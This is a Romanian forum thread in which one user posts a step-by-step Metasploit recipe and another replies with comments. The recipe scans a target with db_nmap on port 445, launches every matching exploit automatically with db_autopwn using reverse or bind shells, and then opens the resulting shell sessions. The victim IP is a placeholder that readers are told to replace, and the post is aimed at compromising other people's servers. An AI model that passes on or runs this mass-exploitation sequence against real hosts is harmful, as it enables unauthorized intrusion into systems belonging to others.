Jump to content
c0der

Cum sa automatizam exploit-urile in Metasploit

Recommended Posts

Posted

#Exemplu avansat de automatizare a exploiturilor pe un anumit tip de ip, folosind comenzi din consola shell[terminal] in metasploit

# practic luam fiecare exploit din baza de date a metasploitului, si le testeaza pe serverul tinta :)

# ip ul 127.0.0.1 va fi folosit ca ip ul victimei :) - voi o sa puneti alt ip

# algoritmul "db_autopwn" are urmatoarele optiuni :

-t : show all matching exploit modules

-x : select modules based on vulnerability references

-p : select modules based on open ports

-e : launch exploits against all matched targets

-s : only obtain a single shell per target system

-r : use a reverse connect shell

-b : use a bind shell on a random port

-h : display this help text

_____________________________________________

Pasii care trebuiesc urmati:

./msfconsole

load db_postgres

db_create tester

db_hosts

db_nmap 127.0.0.1 -p 445

db_hosts

db_autopwn

db_autopwn -t -p -e -s -b

sessions -l

sessions -i 1

sper sa va fie de folos pt cei care utilizati metasploit.Numai Bine.

Posted

Rezultatele se salveaza in postgres...ca doar nu degeaba folosesti baza de date...daca te uiti prin scripturi pe acolo ai sa vezi exact cum se numeste...cu sessions -l vezi cate sesiuni active ai...si cu sessions -i intereactionezi cu ele....nu prea ai ce salva :)

Apropo de automatizarea asta....eu am incercat acu cateva luni in urma...si fara nici un rezultat valabil....exista cineva care o avut rezultate?

Asa...si ca o ultima completare de ex daca pui sa exploateze portul 80....nu ar fi stealth deloc, pentru ca ar incerca toate exploiturile pe care le are pentru portul 80, deci daca target-ul meu ruleaza un Apache, degeaba autopwn-ul va incerca exploituri de IIS de exemplu. Oricum is putin dezamagit de ultima versiune de framework pentru ca e putin buggy...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...